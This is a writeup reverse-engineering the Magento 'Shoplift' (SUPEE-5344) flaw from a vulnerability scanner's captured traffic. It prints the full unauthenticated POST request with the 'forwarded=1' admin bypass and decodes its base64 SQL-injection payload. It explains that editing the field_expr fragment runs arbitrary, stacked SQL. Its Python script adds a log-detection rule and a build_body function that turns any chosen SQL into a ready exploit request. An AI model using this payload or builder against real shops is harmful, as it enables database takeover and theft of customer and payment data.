**Reverse Engineering writeup for Magento Patch SUPEE-5344**

All credit to https://shoplift.byte.nl for their vulnerability scanner.

No responsibility is accepted by the author for the actions carried out by utilisation of the following information, by any party.

****

A few days ago, byte.nl released a tool for checking whether online shops are vulnerable to a bug in the Magento e-commerce platform (tested here against v1.9.0.1): an SQL injection reachable without an admin login on certain /admin paths, where the 'forwarded' request parameter lets the request past the admin authentication check. Apparently a technical writeup is to follow shortly.

The method used to find the exploit was to set up a clean, unpatched instance of Magento 1.9.0.1, run the vulnerability check against it, and capture the request and response at the Apache level.

This process can be emulated using the following steps:

* Get a clean copy of the 1.9.0.1 install from https://www.magentocommerce.com/products/downloads/magento/

* Install on a clean server, enabling mod_rewrite and mod_dumpio in Apache (for Apache 2.4: DumpIOInput On, DumpIOOutput On and LogLevel dumpio:trace7)

* Check the installation is working (database is writeable) and that mod_dumpio is writing to the Apache error log (here /var/log/error.log)

* Disable mod_deflate and gzip compression in PHP / Apache, so the logged response body is plain text

* Run byte.nl's tool against the site

* Halt mod_dumpio logging and analyse the logged HTTP POST request and its response

****

Using the above method, byte.nl's tool was observed to submit the following HTTP request (request line, then the form-encoded body):

POST {{SITE_URL}}/index.php/admin/Cms_Wysiwyg/directive/index/

filter=cG9wdWxhcml0eVtmcm9tXT0wJnBvcHVsYXJpdHlbdG9dPTMmcG9wdWxhcml0eVtmaWVsZF9leHByXT0wKTs=&___directive=e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ&forwarded=1

The filter and ___directive values are base64 encoded (note that the ___directive value is sent without its trailing '=' padding). Decoding the above values:

filter = popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);

___directive = {{block type=Adminhtml/report_search_grid output=getCsvFile}}

Reading through the patch (https://tools.byte.nl/magpatch/v1.8.0/patch-shoplift.sh), the decoded 'filter' value is where the injection sits: its popularity[field_expr] entry is substituted unescaped into the SQL condition built in lib/Varien/Db/Adapter/Pdo/Mysql.php, one of the files the patch modifies. The trailing ');' in the probe closes the expression Magento wraps the field in and ends the statement.

Editing this SQL fragment, re-encoding the filter to base64 and submitting the POST request with the altered value allows arbitrary SQL to be executed against the Magento database, including stacked statements after the ');'. What that reaches beyond the database, for example reading or writing files on the MySQL host, depends on the privileges of the database user Magento connects with.
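As an added example (not code from the original writeup, from byte.nl's scanner or from Magento), the following Python decodes the captured body, pulls out the popularity[field_expr] value that reaches the SQL, flags the request with a simple detection rule, and rebuilds the body with an edited field_expr exactly as the scanner encodes it. The request body is the one captured above; the helper names, the DIRECTIVE constant and the FIELD_EXPR_ALLOWED allow-list are this example's own assumptions and the allow-list is a detection heuristic, not the check applied by the SUPEE-5344 patch.

```python
"""Decode, inspect, flag and rebuild the SUPEE-5344 ("Shoplift") probe body.

Added example for this writeup; it is neither byte.nl's scanner code nor
Magento's. It runs offline on the request body captured above and sends
nothing. Helper names and the allow-list regex are this example's own.
"""
import base64
import re
from urllib.parse import unquote

# The path and body captured from the scanner, copied from the writeup.
CAPTURED_PATH = "/index.php/admin/Cms_Wysiwyg/directive/index/"
CAPTURED_BODY = (
    "filter=cG9wdWxhcml0eVtmcm9tXT0wJnBvcHVsYXJpdHlbdG9dPTMmcG9wdWxhcml0eVtmaWVsZF9leHByXT0wKTs="
    "&___directive=e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ"
    "&forwarded=1"
)
DIRECTIVE = "{{block type=Adminhtml/report_search_grid output=getCsvFile}}"

# Illustrative allow-list for a legitimate field_expr: a bare identifier, a
# single function call on Magento's '#?' column placeholder, or '#?' itself.
# This is a detection heuristic written for this example, not the check the
# SUPEE-5344 patch applies.
FIELD_EXPR_ALLOWED = re.compile(r"^(#\?|[A-Za-z_][A-Za-z0-9_]*(\(#\?\))?)$")


def parse_form(body: str) -> dict:
    """Split a form-encoded body on '&' and on the first '=' of each pair.

    Hand-rolled rather than urllib.parse.parse_qs so that a ';' inside an
    SQL payload is never treated as a pair separator and a raw '+' in base64
    is not turned into a space."""
    fields = {}
    for pair in body.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            fields[unquote(key)] = unquote(value)
    return fields


def b64decode_lenient(value: str) -> str:
    """Decode base64 whose '=' padding may have been stripped, as it is on
    the scanner's ___directive value."""
    return base64.b64decode(value + "=" * (-len(value) % 4)).decode()


def decode_body(body: str) -> dict:
    """Return the form fields with 'filter' and '___directive' decoded."""
    fields = parse_form(body)
    for key in ("filter", "___directive"):
        if key in fields:
            fields[key] = b64decode_lenient(fields[key])
    return fields


def grid_filter_fields(decoded_filter: str) -> dict:
    """The decoded filter is itself a query string (Magento runs parse_str
    on it); return its popularity[...] entries."""
    return parse_form(decoded_filter)


def is_shoplift_probe(path: str, body: str) -> bool:
    """Detection rule for a captured request: directive endpoint, the
    'forwarded' auth-bypass parameter present, and a field_expr that is not
    a plain column expression."""
    if "/Cms_Wysiwyg/directive/" not in path:
        return False
    fields = decode_body(body)
    if "forwarded" not in fields or "filter" not in fields:
        return False
    exprs = [v for k, v in grid_filter_fields(fields["filter"]).items()
             if k.endswith("[field_expr]")]
    return any(not FIELD_EXPR_ALLOWED.match(e) for e in exprs)


def build_body(field_expr: str) -> str:
    """Rebuild the POST body with a different popularity[field_expr] (the
    value the writeup says to edit), encoded the way the scanner encodes it:
    padded base64 for filter, unpadded for ___directive, both sent raw.
    field_expr is inserted verbatim; percent-encode any '&' in it yourself."""
    grid_filter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=" + field_expr
    filter_b64 = base64.b64encode(grid_filter.encode()).decode()
    directive_b64 = base64.b64encode(DIRECTIVE.encode()).decode().rstrip("=")
    # A '+' in base64 would be read as a space by a form parser; escape it.
    body = f"filter={filter_b64}&___directive={directive_b64}&forwarded=1"
    return body.replace("+", "%2B")


if __name__ == "__main__":
    decoded = decode_body(CAPTURED_BODY)
    for key, value in decoded.items():
        print(f"{key} = {value}")
    print("field_expr reaching SQL:",
          grid_filter_fields(decoded["filter"])["popularity[field_expr]"])
    print("flagged as probe:", is_shoplift_probe(CAPTURED_PATH, CAPTURED_BODY))
    print("round trip matches capture:", build_body("0);") == CAPTURED_BODY)
```

Run it as a script to see the decoded fields; build_body("0);") reproduces the captured body byte for byte, which is a useful sanity check before changing the field_expr, and is_shoplift_probe can be pointed at request lines and bodies pulled from a mod_dumpio or access log to find earlier probes.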

Use responsibly,